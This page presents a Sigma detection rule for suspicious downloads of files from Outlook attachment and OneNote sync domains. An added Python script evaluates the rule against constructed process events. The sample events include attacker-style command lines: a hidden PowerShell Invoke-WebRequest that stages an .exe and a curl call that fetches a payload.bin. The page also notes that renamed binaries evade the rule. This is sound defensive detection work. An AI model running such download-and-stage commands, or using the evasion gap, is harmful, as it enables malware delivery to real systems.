Suspicious Download from Office Domain
Detects suspicious ways to download files from Microsoft domains that are used to store attachments in emails or OneNote documents
Sigma rule
```yaml
title: Suspicious Download from Office Domain
id: 00d49ed5-4491-4271-a8db-650a4ef6f8c1
status: test
description: Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents
references:
    - https://twitter.com/an0n_r0/status/1474698356635193346?s=12
    - https://twitter.com/mrd0x/status/1475085452784844803?s=12
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2021-12-27
modified: 2022-08-02
tags:
    - attack.command-and-control
    - attack.resource-development
    - attack.t1105
    - attack.t1608
logsource:
    product: windows
    category: process_creation
detection:
    selection_download:
        - Image|endswith:
              - '\curl.exe'
              - '\wget.exe'
        - CommandLine|contains:
              - 'Invoke-WebRequest'
              - 'iwr '
              - 'curl '
              - 'wget '
              - 'Start-BitsTransfer'
              - '.DownloadFile('
              - '.DownloadString('
    selection_domains:
        CommandLine|contains:
            - 'https://attachment.outlook.live.net/owa/'
            - 'https://onenoteonlinesync.onenote.com/onenoteonlinesync/'
    condition: all of selection_*
falsepositives:
    - Scripts or tools that download attachments from these domains (OneNote, Outlook 365)
level: high
```
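The rule's logic, evaluated over a handful of constructed process_creation events, as an added example (this is not code from the rule, from SigmaHQ, or from the authors). Note that `selection_download` is a YAML list of two maps, so `Image|endswith` and `CommandLine|contains` are OR-ed, while `condition: all of selection_*` AND-s that result with `selection_domains`. The events below are made up; the attachment and OneNote identifiers in the URLs are placeholders, and the matching is case-insensitive, which is the Sigma default when no `cased` modifier is present.

```python
"""Evaluate 'Suspicious Download from Office Domain' over constructed events.

Added example, not SigmaHQ code. Sample events are constructed, not real
telemetry; URL path components after the rule's prefixes are placeholders.
"""

from typing import Dict, List

# String values copied from the rule.
IMAGE_ENDSWITH = ["\\curl.exe", "\\wget.exe"]
CMDLINE_CONTAINS = [
    "Invoke-WebRequest", "iwr ", "curl ", "wget ",
    "Start-BitsTransfer", ".DownloadFile(", ".DownloadString(",
]
DOMAIN_CONTAINS = [
    "https://attachment.outlook.live.net/owa/",
    "https://onenoteonlinesync.onenote.com/onenoteonlinesync/",
]


def _endswith_any(value: str, suffixes: List[str]) -> bool:
    # Sigma string comparisons are case-insensitive unless |cased is used.
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)


def _contains_any(value: str, needles: List[str]) -> bool:
    v = value.lower()
    return any(n.lower() in v for n in needles)


def selection_download(event: Dict[str, str]) -> bool:
    """List of two maps in the rule, so the two checks are OR-ed."""
    return (_endswith_any(event.get("Image", ""), IMAGE_ENDSWITH)
            or _contains_any(event.get("CommandLine", ""), CMDLINE_CONTAINS))


def selection_domains(event: Dict[str, str]) -> bool:
    return _contains_any(event.get("CommandLine", ""), DOMAIN_CONTAINS)


def matches(event: Dict[str, str]) -> bool:
    """condition: all of selection_*"""
    return selection_download(event) and selection_domains(event)


# Constructed sample events (placeholder IDs such as EXAMPLE_ID are invented).
SAMPLE_EVENTS = [
    {   # PowerShell cmdlet pulling an Outlook attachment: should match
        "id": "ps-iwr",
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": 'powershell.exe -nop -w hidden -c "Invoke-WebRequest '
                       '-Uri https://attachment.outlook.live.net/owa/EXAMPLE_ID '
                       '-OutFile C:\\Users\\Public\\stage.exe"',
    },
    {   # curl.exe against the OneNote sync host: should match via Image
        "id": "curl-onenote",
        "Image": "C:\\Windows\\System32\\curl.exe",
        "CommandLine": "curl.exe -o C:\\Users\\Public\\payload.bin "
                       "https://onenoteonlinesync.onenote.com/onenoteonlinesync/EXAMPLE_ID",
    },
    {   # curl.exe to an unrelated host: download tool, wrong domain, no match
        "id": "curl-other",
        "Image": "C:\\Windows\\System32\\curl.exe",
        "CommandLine": "curl.exe -o C:\\Users\\Public\\x.bin https://example.com/file",
    },
    {   # Renamed curl binary: neither selector in selection_download fires,
        # so the rule misses it even though the domain is present (coverage gap)
        "id": "renamed-curl",
        "Image": "C:\\Users\\Public\\c.exe",
        "CommandLine": "c.exe -o out.bin https://attachment.outlook.live.net/owa/EXAMPLE_ID",
    },
    {   # Mixed case alias and host: still matches because matching is case-insensitive
        "id": "case-variant",
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell IWR https://ATTACHMENT.OUTLOOK.LIVE.NET/owa/EXAMPLE_ID",
    },
    {   # Ordinary Outlook launch: no match
        "id": "benign-outlook",
        "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
        "CommandLine": "OUTLOOK.EXE",
    },
]


def matching_ids(events: List[Dict[str, str]]) -> List[str]:
    """Return the ids of the events the rule would alert on."""
    return [e["id"] for e in events if matches(e)]


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(f"{e['id']:>15}: {'ALERT' if matches(e) else 'ok'}")
```

The `renamed-curl` event is the caveat a practitioner should keep in mind: the rule keys on well-known tool names and PowerShell download idioms, so a copied or renamed binary, or a custom downloader, reaches the same hosts without tripping it. The Image and CommandLine checks identify the delivery technique; the domain list identifies the staging location, and only the combination raises the alert.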
Related rules
- Remote File Copy
- Suspicious Deno File Written from Remote Source
- Hidden Flag Set On File/Directory Via Chflags - MacOS
- Insensitive Subfolder Search Via Findstr.EXE
- Remote File Download Via Findstr.EXE